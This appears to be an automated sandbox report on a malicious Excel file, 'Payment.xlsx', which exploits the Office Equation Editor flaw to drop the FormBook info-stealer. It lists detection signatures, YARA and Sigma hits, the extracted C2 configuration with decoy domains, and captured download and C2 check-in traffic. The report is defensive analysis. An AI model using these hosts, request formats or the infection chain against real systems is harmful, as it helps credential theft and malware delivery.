Analysis Report Payment.xlsx

Overview

General Information

Sample Name: Payment.xlsx
Analysis ID: 404048
MD5: 05f49aa5b342dedd1d7b6673f3d8bc41
SHA1: 9ca061b9851269f8b1d2fd990ebe119903a5f0fb
SHA256: 3a6cc669542f5e3f9a801e9344b182c71e72396e27afbeac14eeb3d3be0b9498
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2584 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2872 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2976 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2460 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2276 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • NAPSTAT.EXE (PID: 1960 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
          • cmd.exe (PID: 268 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      7.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        7.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          7.2.vbc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          Exploits:

          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network Connection, Author: Joe Security, Data: DestinationIp: 192.3.122.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe

          System Summary:

          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2584, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2872
          Sigma detected: Execution from Suspicious Folder
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2584, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2872

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe, ReversingLabs: Detection: 12%
          Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 12%
          Multi AV Scanner detection for submitted file
          Source: Payment.xlsx, Virustotal: Detection: 18%
          Source: Payment.xlsx, ReversingLabs: Detection: 10%
          Yara detected FormBook
          Source: Yara match, File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe, Joe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp
          Source: excel.exe, Memory has grown: Private usage: 4MB later: 68MB
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0039A860
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0039A851
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047346A
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473478
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047331A
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047352A
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473328
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473538
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004731D8
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004731E8
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004735E8
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004735F8
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi 7_2_0040C368
          Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop esi 7_2_004157FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 4x nop then pop edi 9_2_0008C368
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 4x nop then pop esi 9_2_000957FE
          Source: global traffic, DNS query: name: will.kasraz.com
          Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 3132 WEB-CLIENT PNG large image width download attempt 192.3.122.177:80 -> 192.168.2.22:49167
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.cats16.com/8u3b/
          Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 04 May 2021 14:58:50 GMT | Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 | Last-Modified: Tue, 04 May 2021 10:00:54 GMT | ETag: "a2800-5c17e27600d6b" | Accept-Ranges: bytes | Content-Length: 665600 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
          Source: global traffic, HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1 | Host: www.donelys.com | Connection: close
          Source: global traffic, HTTP traffic detected: GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1 | Host: www.discjockeydelraybeach.com | Connection: close
          Source: global traffic, HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1 | Host: www.arfjkacsgatfzbazpdth.com | Connection: close
          Source: global traffic, HTTP traffic detected: GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1 | Host: www.girlboyfriends.com | Connection: close
          Source: global traffic, HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1 | Host: www.burundiacademyst.com | Connection: close
          Source: global traffic, HTTP traffic detected: GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1 | Host: www.pipienta.com | Connection: close
          Source: Joe Sandbox View, IP Address: 198.54.117.210
          Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
          Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP
          Source: global traffic, HTTP traffic detected: GET /a/so.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: will.kasraz.com | Connection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F90404A.emf
          Source: unknown, DNS traffic detected: queries for: will.kasraz.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 04 May 2021 15:00:21 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: __cfduid=d94f65b7ed78b4bb4ec06c920816dea0c1620140420; expires=Thu, 03-Jun-21 15:00:20 GMT; path=/; domain=.www.burundiacademyst.com; HttpOnly; SameSite=Lax | CF-Cache-Status: MISS | cf-request-id: 09d97e072e00004e44b212b000000001 | Server: cloudflare | CF-RAY: 64a2991eb90d4e44-FRA
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
